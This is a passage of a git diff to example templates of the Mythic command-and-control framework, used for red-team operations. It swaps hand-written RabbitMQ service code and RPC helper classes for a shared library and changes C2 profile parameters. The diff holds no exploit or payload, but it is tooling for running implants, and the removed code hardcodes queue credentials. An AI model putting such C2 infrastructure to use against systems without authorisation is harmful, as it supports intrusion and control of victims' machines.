+ description="Proxy Username", + default_value="", required=False, - parameter_type=ParameterType.Dictionary, - default_value=[ - { - "name": "USER_AGENT", - "max": 1, - "default_value": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko", - "default_show": True, - }, - { - "name": "host", - "max": 2, - "default_value": "", - "default_show": False, - }, - { - "name": "*", - "max": -1, - "default_value": "", - "default_show": False - } - ] ), C2ProfileParameter( - name="AESPSK", - description="Base64 of a 32B AES Key", + name="proxy_pass", + description="Proxy Password", default_value="", required=False, ), @@ -147,4 +128,5 @@ class HTTP(C2Profile): default_value="10", verifier_regex="^[0-9]+$", required=False, - ),""" \ No newline at end of file + ), + ] diff --git a/Example_C2_Profile/mythic/mythic_service.py b/Example_C2_Profile/mythic/mythic_service.py index dde56b77c..415d37536 100755 --- a/Example_C2_Profile/mythic/mythic_service.py +++ b/Example_C2_Profile/mythic/mythic_service.py @@ -1,410 +1,3 @@ #!/usr/bin/env python3 -import aio_pika -import os -import time -import sys -import subprocess -import _thread -import base64 -import json -import socket -import asyncio -import pathlib -import traceback -from C2ProfileBase import * -from importlib import import_module, invalidate_caches -from functools import partial - -credentials = None -connection_params = None -running = False -process = None -thread = None -hostname = "" -output = "" -exchange = None -container_files_path = None - - -def deal_with_stdout(): - global process - global output - while True: - try: - for line in iter(process.stdout.readline, b""): - output += line.decode("utf-8") - except Exception as e: - print("Exiting thread due to: {}\n".format(str(e))) - sys.stdout.flush() - break - - -def import_all_c2_functions(): - import glob - - # Get file paths of all modules. - modules = glob.glob("c2_functions/*.py") - invalidate_caches() - for x in modules: - if not x.endswith("__init__.py") and x[-3:] == ".py": - module = import_module("c2_functions." 
+ pathlib.Path(x).stem, package=None) - for el in dir(module): - if "__" not in el: - globals()[el] = getattr(module, el) - - -async def send_status(message="", routing_key=""): - global exchange - try: - message_body = aio_pika.Message(message.encode()) - await exchange.publish(message_body, routing_key=routing_key) - except Exception as e: - print("Exception in send_status: {}".format(str(e))) - sys.stdout.flush() - - -async def callback(message: aio_pika.IncomingMessage): - global running - global process - global output - global thread - global hostname - global container_files_path - with message.process(): - # messages of the form: c2.modify.PROFILE NAME.command - try: - command = message.routing_key.split(".")[3] - username = message.routing_key.split(".")[4] - server_path = container_files_path / "server" - # command = body.decode('utf-8') - if command == "start": - if not running: - # make sure to start the /Apfell/server in the background - os.chmod(server_path, mode=0o777) - output = "" - process = subprocess.Popen( - str(server_path), - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - cwd=str(container_files_path), - ) - thread = _thread.start_new_thread(deal_with_stdout, ()) - time.sleep(3) - process.poll() - if process.returncode is not None: - # this means something went wrong and the process is dead - running = False - await send_status( - message="Failed to start\nOutput: {}".format(output), - routing_key="c2.status.{}.stopped.start.{}".format( - hostname, username - ), - ) - output = "" - else: - running = True - await send_status( - message="Started with pid: {}...\nOutput: {}".format( - str(process.pid), output - ), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Already running...\nOutput: {}".format(output), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - elif command == "stop": - if running: - try: - process.kill() - process.communicate() - except Exception as e: - pass - try: - thread.exit() - except Exception as e: - pass - running = False - await send_status( - message="Process killed...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Process not running...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - # make sure to stop the /Apfell/server in the background - elif command == "status": - if running: - await send_status( - message="Output: {}".format(output), - routing_key="c2.status.{}.running.status.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="C2 is not running", - routing_key="c2.status.{}.stopped.status.{}".format( - hostname, username - ), - ) - elif command == "get_config": - try: - path = container_files_path / "config.json" - file_data = open(path, "rb").read() - except Exception as e: - file_data = b"File not found" - encoded_data = json.dumps( - { - "filename": "config.json", - "data": base64.b64encode(file_data).decode("utf-8"), - } - ) - await send_status( - message=encoded_data, - routing_key="c2.status.{}.{}.get_config.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "writefile": - try: - message = json.loads(message.body.decode("utf-8")) - file_path = container_files_path / message["file_path"] - 
file_path = file_path.resolve() - if container_files_path not in file_path.parents: - response = { - "status": "error", - "error": "trying to break out of path", - } - else: - file = open(file_path, "wb") - file.write(base64.b64decode(message["data"])) - file.close() - response = {"status": "success", "file": message["file_path"]} - except Exception as e: - response = {"status": "error", "error": str(e)} - await send_status( - message=json.dumps(response), - routing_key="c2.status.{}.{}.writefile.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "sync_classes": - try: - import_all_c2_functions() - # c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - else: - print("Unknown command: {}".format(command)) - sys.stdout.flush() - except Exception as e: - print("Failed overall message processing: " + str(e)) - sys.stdout.flush() - - -async def sync_classes(): - try: - import_all_c2_functions() - c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - - -async def rabbit_c2_rpc_callback( - exchange: aio_pika.Exchange, message: aio_pika.IncomingMessage -): - with message.process(): - request = json.loads(message.body.decode()) - if "action" in request: - response = await globals()[request["action"]](request) - response = json.dumps(response.to_json()).encode() - else: - response = json.dumps( - {"status": "error", "error": "Missing action"} - ).encode() - try: - await exchange.publish( - aio_pika.Message(body=response, correlation_id=message.correlation_id), - routing_key=message.reply_to, - ) - except Exception as e: - print( - "Exception trying to send message back to container for rpc! 
" + str(e) - ) - sys.stdout.flush() - - -async def connect_and_consume_rpc(): - connection = None - global hostname - while connection is None: - try: - connection = await aio_pika.connect_robust( - host="127.0.0.1", - login="mythic_user", - password="mythic_password", - virtualhost="mythic_vhost", - ) - channel = await connection.channel() - # get a random queue that only the apfell server will use to listen on to catch all heartbeats - queue = await channel.declare_queue("{}_rpc_queue".format(hostname)) - await channel.set_qos(prefetch_count=50) - try: - task = queue.consume( - partial(rabbit_c2_rpc_callback, channel.default_exchange) - ) - result = await asyncio.wait_for(task, None) - except Exception as e: - print("Exception in connect_and_consume .consume: {}".format(str(e))) - sys.stdout.flush() - except (ConnectionError, ConnectionRefusedError) as c: - print("Connection to rabbitmq failed, trying again...") - sys.stdout.flush() - except Exception as e: - print("Exception in connect_and_consume_rpc connect: {}".format(str(e))) - # print("Exception in connect_and_consume connect: {}".format(str(e))) - sys.stdout.flush() - await asyncio.sleep(2) - - -async def mythic_service(): - global hostname - global exchange - global container_files_path - connection = None - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - container_files_path = pathlib.Path( - os.path.abspath(main_config["container_files_path"]) - ) - container_files_path = container_files_path / "c2_code" - while connection is None: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - except Exception as e: - await asyncio.sleep(2) - try: - channel = await connection.channel() - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - queue = await channel.declare_queue("", exclusive=True) - await queue.bind( - exchange="mythic_traffic", routing_key="c2.modify.{}.#".format(hostname) - ) - # just want to handle one message at a time so we can clean up and be ready - await channel.set_qos(prefetch_count=30) - print("Listening for c2.modify.{}.#".format(hostname)) - sys.stdout.flush() - task = queue.consume(callback) - await sync_classes() - task4 = asyncio.ensure_future(connect_and_consume_rpc()) - result = await asyncio.gather(task, task4) - # send_status(message="", routing_key="c2.status.{}.stopped.stop".format(hostname)) - except Exception as e: - print(str(traceback.format_exc())) - sys.stdout.flush() - - -async def heartbeat_loop(): - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - while True: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - channel = await connection.channel() - # declare our heartbeat exchange that everybody will publish to, but only the apfell server will are about - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - except 
Exception as e: - print(str(e)) - await asyncio.sleep(2) - continue - while True: - try: - # routing key is ignored for fanout, it'll go to anybody that's listening, which will only be the server - await exchange.publish( - aio_pika.Message("heartbeat".encode()), - routing_key="c2.heartbeat.{}".format(hostname), - ) - await asyncio.sleep(10) - except Exception as e: - print(str(e)) - # if we get an exception here, break out to the bigger loop and try to connect again - break - -# start our service -loop = asyncio.get_event_loop() -loop.create_task(mythic_service()) -loop.create_task(heartbeat_loop()) -loop.run_forever() +from mythic_c2_container import mythic_service +mythic_service.start_service_and_heartbeat(debug=False) \ No newline at end of file diff --git a/Example_Payload_Type/Dockerfile b/Example_Payload_Type/Dockerfile index 655b67d1d..f5a84615f 100755 --- a/Example_Payload_Type/Dockerfile +++ b/Example_Payload_Type/Dockerfile @@ -1,2 +1,2 @@ # pull in the appropriate language's payload container from itsafeaturemythic on dockerhub -from itsafeaturemythic/csharp_payload:0.0.6 +from itsafeaturemythic/csharp_payload:0.0.11 diff --git a/Example_Payload_Type/mythic/CommandBase.py b/Example_Payload_Type/mythic/CommandBase.py deleted file mode 100644 index 6e949deb3..000000000 --- a/Example_Payload_Type/mythic/CommandBase.py +++ /dev/null @@ -1,483 +0,0 @@ -from abc import abstractmethod, ABCMeta -import json -from enum import Enum -import base64 -import uuid -from pathlib import Path - - -class MythicStatus(Enum): - Success = "success" - Error = "error" - Completed = "completed" - Processed = "processed" - Processing = "processing" - - -class ParameterType(Enum): - String = "String" - Boolean = "Boolean" - File = "File" - Array = "Array" - ChooseOne = "Choice" - ChooseMultiple = "ChoiceMultiple" - Credential_JSON = "Credential-JSON" - Credential_Account = "Credential-Account" - Credential_Realm = "Credential-Realm" - Credential_Type = ("Credential-Type",) - Credential_Value = "Credential-Credential" - Number = "Number" - Payload = "PayloadList" - ConnectionInfo = "AgentConnect" - - -class CommandParameter: - def __init__( - self, - name: str, - type: ParameterType, - description: str = "", - choices: [any] = None, - required: bool = True, - default_value: any = None, - validation_func: callable = None, - value: any = None, - supported_agents: [str] = None, - ): - self.name = name - self.type = type - self.description = description - if choices is None: - self.choices = [] - else: - self.choices = choices - self.required = required - self.validation_func = validation_func - if value is None: - self.value = default_value - else: - self.value = value - self.default_value = default_value - self.supported_agents = supported_agents if supported_agents is not None else [] - - @property - def name(self): - return self._name - - @name.setter - def name(self, name): - self._name = name - - @property - def type(self): - return self._type - - @type.setter - def type(self, type): - self._type = type - - @property - def description(self): - return self._description - - @description.setter - def description(self, description): - self._description = description - - @property - def required(self): - return self._required - - @required.setter - def required(self, required): - self._required = required - - @property - def choices(self): - return self._choices - - @choices.setter - def choices(self, choices): - self._choices = choices - - @property - def validation_func(self): - return 
self._validation_func - - @validation_func.setter - def validation_func(self, validation_func): - self._validation_func = validation_func - - @property - def supported_agents(self): - return self._supported_agents - - @supported_agents.setter - def supported_agents(self, supported_agents): - self._supported_agents = supported_agents - - @property - def value(self): - return self._value - - @value.setter - def value(self, value): - if value is not None: - type_validated = TypeValidators().validate(self.type, value) - if self.validation_func is not None: - try: - self.validation_func(type_validated) - self._value = type_validated - except Exception as e: - raise ValueError( - "Failed validation check for parameter {} with value {}".format( - self.name, str(value) - ) - ) - return - else: - # now we do some verification ourselves based on the type - self._value = type_validated - return - self._value = value - - def to_json(self): - return { - "name": self._name, - "type": self._type.value, - "description": self._description, - "choices": "\n".join(self._choices), - "required": self._required, - "default_value": self._value, - "supported_agents": "\n".join(self._supported_agents), - } - - -class TypeValidators: - def validateString(self, val): - return str(val) - - def validateNumber(self, val): - try: - return int(val) - except: - return float(val) - - def validateBoolean(self, val): - if isinstance(val, bool): - return val - else: - raise ValueError("Value isn't bool") - - def validateFile(self, val): - try: # check if the file is actually a file-id - uuid_obj = uuid.UUID(val, version=4) - return str(uuid_obj) - except ValueError: - pass - return base64.b64decode(val) - - def validateArray(self, val): - if isinstance(val, list): - return val - else: - raise ValueError("value isn't array") - - def validateCredentialJSON(self, val): - if isinstance(val, dict): - return val - else: - raise ValueError("value ins't a dictionary") - - def validatePass(self, val): - return val - - def validateChooseMultiple(self, val): - if isinstance(val, list): - return val - else: - raise ValueError("Choices aren't in a list") - - def validatePayloadList(self, val): - return str(uuid.UUID(val, version=4)) - - def validateAgentConnect(self, val): - if isinstance(val, dict): - return val - else: - raise ValueError("Not instance of dictionary") - - switch = { - "String": validateString, - "Number": validateNumber, - "Boolean": validateBoolean, - "File": validateFile, - "Array": validateArray, - "Credential-JSON": validateCredentialJSON, - "Credential-Account": validatePass, - "Credential-Realm": validatePass, - "Credential-Type": validatePass, - "Credential-Credential": validatePass, - "Choice": validatePass, - "ChoiceMultiple": validateChooseMultiple, - "PayloadList": validatePayloadList, - "AgentConnect": validateAgentConnect, - } - - def validate(self, type: ParameterType, val: any): - return self.switch[type.value](self, val) - - -class TaskArguments(metaclass=ABCMeta): - def __init__(self, command_line: str): - self.command_line = str(command_line) - - @property - def args(self): - return self._args - - @args.setter - def args(self, args): - self._args = args - - def get_arg(self, key: str): - if key in self.args: - return self.args[key].value - else: - return None - - def has_arg(self, key: str) -> bool: - return key in self.args - - def get_commandline(self) -> str: - return self.command_line - - def is_empty(self) -> bool: - return len(self.args) == 0 - - def add_arg(self, key: str, value, type: 
ParameterType = None): - if key in self.args: - self.args[key].value = value - else: - if type is None: - self.args[key] = CommandParameter( - name=key, type=ParameterType.String, value=value - ) - else: - self.args[key] = CommandParameter(name=key, type=type, value=value) - - def rename_arg(self, old_key: str, new_key: str): - if old_key not in self.args: - raise Exception("{} not a valid parameter".format(old_key)) - self.args[new_key] = self.args.pop(old_key) - - def remove_arg(self, key: str): - self.args.pop(key, None) - - def to_json(self): - temp = [] - for k, v in self.args.items(): - temp.append(v.to_json()) - return temp - - def load_args_from_json_string(self, command_line: str): - temp_dict = json.loads(command_line) - for k, v in temp_dict.items(): - for k2,v2 in self.args.items(): - if v2.name == k: - v2.value = v - - async def verify_required_args_have_values(self): - for k, v in self.args.items(): - if v.value is None: - v.value = v.default_value - if v.required and v.value is None: - raise ValueError("Required arg {} has no value".format(k)) - - def __str__(self): - if len(self.args) > 0: - temp = {} - for k, v in self.args.items(): - if isinstance(v.value, bytes): - temp[k] = base64.b64encode(v.value).decode() - else: - temp[k] = v.value - return json.dumps(temp) - else: - return self.command_line - - @abstractmethod - async def parse_arguments(self): - pass - - -class AgentResponse: - def __init__(self, response: dict): - self.response = response - - -class Callback: - def __init__(self, **kwargs): - self.__dict__.update(kwargs) - - -class BrowserScript: - # if a browserscript is specified as part of a PayloadType, then it's a support script - # if a browserscript is specified as part of a command, then it's for that command - def __init__(self, script_name: str, author: str = None): - self.script_name = script_name - self.author = author - - def to_json(self, base_path: Path): - try: - code_file = ( - base_path - / "mythic" - / "browser_scripts" - / "{}.js".format(self.script_name) - ) - if code_file.exists(): - code = code_file.read_bytes() - code = base64.b64encode(code).decode() - else: - code = "" - return {"script": code, "name": self.script_name, "author": self.author} - except Exception as e: - return {"script": str(e), "name": self.script_name, "author": self.author} - - -class MythicTask: - def __init__( - self, taskinfo: dict, args: TaskArguments, status: MythicStatus = None - ): - self.task_id = taskinfo["id"] - self.original_params = taskinfo["original_params"] - self.completed = taskinfo["completed"] - self.callback = Callback(**taskinfo["callback"]) - self.agent_task_id = taskinfo["agent_task_id"] - self.operator = taskinfo["operator"] - self.args = args - self.status = MythicStatus.Success - if status is not None: - self.status = status - - def get_status(self) -> MythicStatus: - return self.status - - def set_status(self, status: MythicStatus): - self.status = status - - def __str__(self): - return str(self.args) - - -class CommandBase(metaclass=ABCMeta): - def __init__(self, agent_code_path: Path): - self.base_path = agent_code_path - self.agent_code_path = agent_code_path / "agent_code" - - @property - @abstractmethod - def cmd(self): - pass - - @property - @abstractmethod - def needs_admin(self): - pass - - @property - @abstractmethod - def help_cmd(self): - pass - - @property - @abstractmethod - def description(self): - pass - - @property - @abstractmethod - def version(self): - pass - - @property - @abstractmethod - def is_exit(self): - pass - - 
@property - @abstractmethod - def is_file_browse(self): - pass - - @property - @abstractmethod - def is_process_list(self): - pass - - @property - @abstractmethod - def is_download_file(self): - pass - - @property - @abstractmethod - def is_remove_file(self): - pass - - @property - @abstractmethod - def is_upload_file(self): - pass - - @property - @abstractmethod - def author(self): - pass - - @property - @abstractmethod - def argument_class(self): - pass - - @property - @abstractmethod - def attackmapping(self): - pass - - @property - def browser_script(self): - pass - - @abstractmethod - async def create_tasking(self, task: MythicTask) -> MythicTask: - pass - - @abstractmethod - async def process_response(self, response: AgentResponse): - pass - - def to_json(self): - params = self.argument_class("").to_json() - if self.browser_script is not None: - bscript = {"browser_script": self.browser_script.to_json(self.base_path)} - else: - bscript = {} - return { - "cmd": self.cmd, - "needs_admin": self.needs_admin, - "help_cmd": self.help_cmd, - "description": self.description, - "version": self.version, - "is_exit": self.is_exit, - "is_file_browse": self.is_file_browse, - "is_process_list": self.is_process_list, - "is_download_file": self.is_download_file, - "is_remove_file": self.is_remove_file, - "is_upload_file": self.is_upload_file, - "author": self.author, - "attack": [{"t_num": a} for a in self.attackmapping], - "parameters": params, - **bscript, - } diff --git a/Example_Payload_Type/mythic/MythicBaseRPC.py b/Example_Payload_Type/mythic/MythicBaseRPC.py deleted file mode 100644 index df92fe802..000000000 --- a/Example_Payload_Type/mythic/MythicBaseRPC.py +++ /dev/null @@ -1,95 +0,0 @@ -from aio_pika import connect_robust, IncomingMessage, Message -import asyncio -import uuid -from CommandBase import * -import json - - -class RPCResponse: - def __init__(self, resp: dict): - self._raw_resp = resp - if resp["status"] == "success": - self.status = MythicStatus.Success - self.response = resp["response"] if "response" in resp else "" - self.error_message = None - else: - self.status = MythicStatus.Error - self.error_message = resp["error"] - self.response = None - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def error_message(self): - return self._error_message - - @error_message.setter - def error_message(self, error_message): - self._error_message = error_message - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - -class MythicBaseRPC: - def __init__(self, task: MythicTask): - self.task_id = task.task_id - self.connection = None - self.channel = None - self.callback_queue = None - self.futures = {} - self.loop = asyncio.get_event_loop() - - async def connect(self): - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - self.connection = await connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - self.channel = await self.connection.channel() - self.callback_queue = await self.channel.declare_queue(exclusive=True) - await self.callback_queue.consume(self.on_response) - - return self - - def on_response(self, message: IncomingMessage): - future = self.futures.pop(message.correlation_id) - future.set_result(message.body) 
- - async def call(self, n, receiver: str = None) -> RPCResponse: - if self.connection is None: - await self.connect() - correlation_id = str(uuid.uuid4()) - future = self.loop.create_future() - - self.futures[correlation_id] = future - if receiver is None: - router = "rpc_queue" - else: - router = "{}_rpc_queue".format(receiver) - await self.channel.default_exchange.publish( - Message( - json.dumps(n).encode(), - content_type="application/json", - correlation_id=correlation_id, - reply_to=self.callback_queue.name, - ), - routing_key=router, - ) - - return RPCResponse(json.loads(await future)) diff --git a/Example_Payload_Type/mythic/MythicC2RPC.py b/Example_Payload_Type/mythic/MythicC2RPC.py deleted file mode 100644 index c43be2875..000000000 --- a/Example_Payload_Type/mythic/MythicC2RPC.py +++ /dev/null @@ -1,29 +0,0 @@ -from MythicBaseRPC import * - - -class MythicC2RPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - if resp.status == MythicStatus.Success: - self.data = resp.response - else: - self.data = None - - @property - def data(self): - return self._data - - @data.setter - def data(self, data): - self._data = data - - -class MythicC2RPC(MythicBaseRPC): - async def call_c2_func( - self, c2_profile: str, function_name: str, message: str - ) -> MythicC2RPCResponse: - resp = await self.call( - {"action": function_name, "message": message, "task_id": self.task_id}, - c2_profile, - ) - return MythicC2RPCResponse(resp) diff --git a/Example_Payload_Type/mythic/MythicCryptoRPC.py b/Example_Payload_Type/mythic/MythicCryptoRPC.py deleted file mode 100644 index 6a7673d17..000000000 --- a/Example_Payload_Type/mythic/MythicCryptoRPC.py +++ /dev/null @@ -1,47 +0,0 @@ -from MythicBaseRPC import * -import base64 - - -class MythicCryptoRPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - if resp.status == MythicStatus.Success: - self.data = resp.response["data"] - else: - self.data = None - - @property - def data(self): - return self._data - - @data.setter - def data(self, data): - self._data = data - - -class MythicCryptoRPC(MythicBaseRPC): - async def encrypt_bytes( - self, data: bytes, with_uuid: bool = False - ) -> MythicCryptoRPCResponse: - resp = await self.call( - { - "action": "encrypt_bytes", - "data": base64.b64encode(data).decode(), - "task_id": self.task_id, - "with_uuid": with_uuid, - } - ) - return MythicCryptoRPCResponse(resp) - - async def decrypt_bytes( - self, data: bytes, with_uuid: bool = False - ) -> MythicCryptoRPCResponse: - resp = await self.call( - { - "action": "decrypt_bytes", - "task_id": self.task_id, - "data": base64.b64encode(data).decode(), - "with_uuid": with_uuid, - } - ) - return MythicCryptoRPCResponse(resp) diff --git a/Example_Payload_Type/mythic/MythicFileRPC.py b/Example_Payload_Type/mythic/MythicFileRPC.py deleted file mode 100644 index 77388965e..000000000 --- a/Example_Payload_Type/mythic/MythicFileRPC.py +++ /dev/null @@ -1,172 +0,0 @@ -from MythicBaseRPC import * -import base64 -import uuid - - -class MythicFileRPCResponse(RPCResponse): - def __init__(self, file: RPCResponse): - super().__init__(file._raw_resp) - if file.status == MythicStatus.Success: - self.agent_file_id = file.response["agent_file_id"] - self.task = file.response["task"] - self.timestamp = file.response["timestamp"] - self.deleted = file.response["deleted"] - self.operator = file.response["operator"] - self.delete_after_fetch = file.response["delete_after_fetch"] - self.filename = 
file.response["filename"] - self.md5 = file.response["md5"] - self.sha1 = file.response["sha1"] - self.chunks_received = file.response["chunks_received"] - self.total_chunks = file.response["total_chunks"] - if "contents" in file.response: - self.contents = base64.b64decode(file.response["contents"]) - else: - self.contents = None - else: - self.agent_file_id = None - self.task = None - self.timestamp = None - self.deleted = None - self.operator = None - self.delete_after_fetch = None - self.filename = None - self.md5 = None - self.sha1 = None - self.chunks_received = None - self.total_chunks = None - self.contents = None - - @property - def agent_file_id(self): - return self._agent_file_id - - @agent_file_id.setter - def agent_file_id(self, agent_file_id): - self._agent_file_id = agent_file_id - - @property - def task(self): - return self._task - - @task.setter - def task(self, task): - self._task = task - - @property - def timestamp(self): - return self._timestamp - - @timestamp.setter - def timestamp(self, timestamp): - self._timestamp = timestamp - - @property - def deleted(self): - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def operator(self): - return self._operator - - @operator.setter - def operator(self, operator): - self._operator = operator - - @property - def delete_after_fetch(self): - return self._delete_after_fetch - - @delete_after_fetch.setter - def delete_after_fetch(self, delete_after_fetch): - self._delete_after_fetch = delete_after_fetch - - @property - def filename(self): - return self._filename - - @filename.setter - def filename(self, filename): - self._filename = filename - - @property - def md5(self): - return self._md5 - - @md5.setter - def md5(self, md5): - self._md5 = md5 - - @property - def sha1(self): - return self._sha1 - - @sha1.setter - def sha1(self, sha1): - self._sha1 = sha1 - - @property - def chunks_received(self): - return self._chunks_received - - @chunks_received.setter - def chunks_received(self, chunks_received): - self._chunks_received = chunks_received - - @property - def total_chunks(self): - return self._total_chunks - - @total_chunks.setter - def total_chunks(self, total_chunks): - self._total_chunks = total_chunks - - @property - def contents(self): - return self._contents - - @contents.setter - def contents(self, contents): - self._contents = contents - - -class MythicFileRPC(MythicBaseRPC): - async def register_file( - self, - file: bytes, - delete_after_fetch: bool = None, - saved_file_name: str = None, - remote_path: str = None, - is_screenshot: bool = None, - is_download: bool = None, - ) -> MythicFileRPCResponse: - resp = await self.call( - { - "action": "register_file", - "file": base64.b64encode(file).decode(), - "delete_after_fetch": delete_after_fetch - if delete_after_fetch is not None - else True, - "saved_file_name": saved_file_name - if saved_file_name is not None - else str(uuid.uuid4()), - "task_id": self.task_id, - "remote_path": remote_path if remote_path is not None else "", - "is_screenshot": is_screenshot if is_screenshot is not None else False, - "is_download": is_download if is_download is not None else False, - } - ) - return MythicFileRPCResponse(resp) - - async def get_file_by_name(self, filename: str) -> MythicFileRPCResponse: - resp = await self.call( - { - "action": "get_file_by_name", - "task_id": self.task_id, - "filename": filename, - } - ) - return MythicFileRPCResponse(resp) diff --git a/Example_Payload_Type/mythic/MythicPayloadRPC.py 
b/Example_Payload_Type/mythic/MythicPayloadRPC.py deleted file mode 100644 index 2af8bb3a1..000000000 --- a/Example_Payload_Type/mythic/MythicPayloadRPC.py +++ /dev/null @@ -1,303 +0,0 @@ -from MythicBaseRPC import * -import base64 -import pathlib - - -class MythicPayloadRPCResponse(RPCResponse): - def __init__(self, payload: RPCResponse): - super().__init__(payload._raw_resp) - if payload.status == MythicStatus.Success: - self.uuid = payload.response["uuid"] - self.tag = payload.response["tag"] - self.operator = payload.response["operator"] - self.creation_time = payload.response["creation_time"] - self.payload_type = payload.response["payload_type"] - self.operation = payload.response["operation"] - self.wrapped_payload = payload.response["wrapped_payload"] - self.deleted = payload.response["deleted"] - self.auto_generated = payload.response["auto_generated"] - self.task = payload.response["task"] - if "contents" in payload.response: - self.contents = payload.response["contents"] - self.build_phase = payload.response["build_phase"] - self.agent_file_id = payload.response["file_id"]["agent_file_id"] - self.filename = payload.response["file_id"]["filename"] - self.c2info = payload.response["c2info"] - self.commands = payload.response["commands"] - self.build_parameters = payload.response["build_parameters"] - else: - self.uuid = None - self.tag = None - self.operator = None - self.creation_time = None - self.payload_type = None - self.operation = None - self.wrapped_payload = None - self.deleted = None - self.auto_generated = None - self.task = None - self.contents = None - self.build_phase = None - self.agent_file_id = None - self.filename = None - self.c2info = None - self.commands = None - self.build_parameters = None - - @property - def uuid(self): - return self._uuid - - @uuid.setter - def uuid(self, uuid): - self._uuid = uuid - - @property - def tag(self): - return self._tag - - @tag.setter - def tag(self, tag): - self._tag = tag - - @property - def operator(self): - return self._operator - - @operator.setter - def operator(self, operator): - self._operator = operator - - @property - def creation_time(self): - return self._creation_time - - @creation_time.setter - def creation_time(self, creation_time): - self._creation_time = creation_time - - @property - def payload_type(self): - return self._payload_type - - @payload_type.setter - def payload_type(self, payload_type): - self._payload_type = payload_type - - @property - def location(self): - return self._location - - @property - def operation(self): - return self._operation - - @operation.setter - def operation(self, operation): - self._operation = operation - - @property - def wrapped_payload(self): - return self._wrapped_payload - - @wrapped_payload.setter - def wrapped_payload(self, wrapped_payload): - self._wrapped_payload = wrapped_payload - - @property - def deleted(self): - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def auto_generated(self): - return self._auto_generated - - @auto_generated.setter - def auto_generated(self, auto_generated): - self._auto_generated = auto_generated - - @property - def task(self): - return self._task - - @task.setter - def task(self, task): - self._task = task - - @property - def contents(self): - return self._contents - - @contents.setter - def contents(self, contents): - try: - self._contents = base64.b64decode(contents) - except: - self._contents = contents - - @property - def build_phase(self): - return self._build_phase 
- - @build_phase.setter - def build_phase(self, build_phase): - self._build_phase = build_phase - - @property - def c2info(self): - return self._c2info - - @c2info.setter - def c2info(self, c2info): - self._c2info = c2info - - @property - def build_parameters(self): - return self._build_parameters - - @build_parameters.setter - def build_parameters(self, build_parameters): - self._build_parameters = build_parameters - - def set_profile_parameter_value(self, - c2_profile: str, - parameter_name: str, - value: any): - if self.c2info is None: - raise Exception("Can't set value when c2 info is None") - for c2 in self.c2info: - if c2["name"] == c2_profile: - c2["parameters"][parameter_name] = value - return - raise Exception("Failed to find c2 name") - - def set_build_parameter_value(self, - parameter_name: str, - value: any): - if self.build_parameters is None: - raise Exception("Can't set value when build parameters are None") - for param in self.build_parameters: - if param["name"] == parameter_name: - param["value"] = value - return - self.build_parameters.append({"name": parameter_name, "value": value}) - - -class MythicPayloadRPC(MythicBaseRPC): - async def get_payload_by_uuid(self, uuid: str) -> MythicPayloadRPCResponse: - resp = await self.call( - {"action": "get_payload_by_uuid", "uuid": uuid, "task_id": self.task_id} - ) - return MythicPayloadRPCResponse(resp) - - async def build_payload_from_template( - self, - uuid: str, - destination_host: str = None, - wrapped_payload: str = None, - description: str = None, - ) -> MythicPayloadRPCResponse: - resp = await self.call( - { - "action": "build_payload_from_template", - "uuid": uuid, - "task_id": self.task_id, - "destination_host": destination_host, - "wrapped_payload": wrapped_payload, - "description": description, - } - ) - return MythicPayloadRPCResponse(resp) - - async def build_payload_from_parameters(self, - payload_type: str, - c2_profiles: list, - commands: list, - build_parameters: list, - filename: str = None, - tag: str = None, - destination_host: str = None, - wrapped_payload: str = None) -> MythicPayloadRPCResponse: - """ - :param payload_type: String value of a payload type name - :param c2_profiles: List of c2 dictionaries of the form: - { "c2_profile": "HTTP", - "c2_profile_parameters": { - 